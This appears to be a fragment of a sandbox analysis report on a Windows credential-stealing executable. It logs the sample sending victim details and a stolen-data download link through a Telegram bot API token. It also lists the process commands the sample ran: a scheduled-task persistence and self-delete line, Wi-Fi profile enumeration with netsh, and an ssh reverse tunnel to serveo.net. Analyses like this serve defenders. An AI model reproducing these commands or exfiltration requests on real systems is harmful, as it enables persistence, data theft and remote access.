                                                                                                                                                                                                2024-09-27 21:27:17 UTC607OUTGET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-27 21:27:18 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:27:18 GMT
                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                Content-Length: 1095
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                2024-09-27 21:27:18 UTC1095INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 32 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 33 35 34 38 39 36 36 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 6f 74 30 6e 65 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 6f 74 30 6e 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 37 38 34 37 32 33 38 39 2c 22 74 69 74 6c 65 22 3a 22 4d 61 6e 61 67 65 6d 65 6e 74 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 37 32 34 33 38 2c 22 74 65 78 74 22 3a 22 23 4d 53
                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":5212,"from":{"id":7935489665,"is_bot":true,"first_name":"Not0neBot","username":"Not0neBot"},"chat":{"id":-4578472389,"title":"Management","type":"group","all_members_are_administrators":true},"date":1727472438,"text":"#MS


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.549740149.154.167.2204431964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-27 21:28:01 UTC902OUTGET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-27 21:28:02 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:28:01 GMT
                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                Content-Length: 1131
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                2024-09-27 21:28:02 UTC1131INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 32 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 33 35 34 38 39 36 36 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 6f 74 30 6e 65 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 6f 74 30 6e 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 37 38 34 37 32 33 38 39 2c 22 74 69 74 6c 65 22 3a 22 4d 61 6e 61 67 65 6d 65 6e 74 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 37 32 34 38 31 2c 22 74 65 78 74 22 3a 22 23 4d 53
                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":5213,"from":{"id":7935489665,"is_bot":true,"first_name":"Not0neBot","username":"Not0neBot"},"chat":{"id":-4578472389,"title":"Management","type":"group","all_members_are_administrators":true},"date":1727472481,"text":"#MS


                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:17:27:06
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\0LpFv1haTA.exe"
                                                                                                                                                                                                Imagebase:0x19457b50000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                Start time:17:27:08
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:17:27:08
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:17:27:08
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:17:27:08
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 3
                                                                                                                                                                                                Imagebase:0x7ff626c40000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
                                                                                                                                                                                                Imagebase:0x7ff664f40000
                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                                                                                                                                                                                                Imagebase:0x21f0f480000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 82%, ReversingLabs
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                                                Imagebase:0x7ff700020000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                Imagebase:0x7ff75d1e0000
                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x1e448040000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                                                                Imagebase:0x7ff700020000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:findstr "SSID BSSID Signal"
                                                                                                                                                                                                Imagebase:0x7ff75d1e0000
                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                                                Imagebase:0x7ff700020000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                Imagebase:0x7ff75d1e0000
                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
                                                                                                                                                                                                Imagebase:0x7ff7308d0000
                                                                                                                                                                                                File size:946'176 bytes
                                                                                                                                                                                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show networks mode=bssid
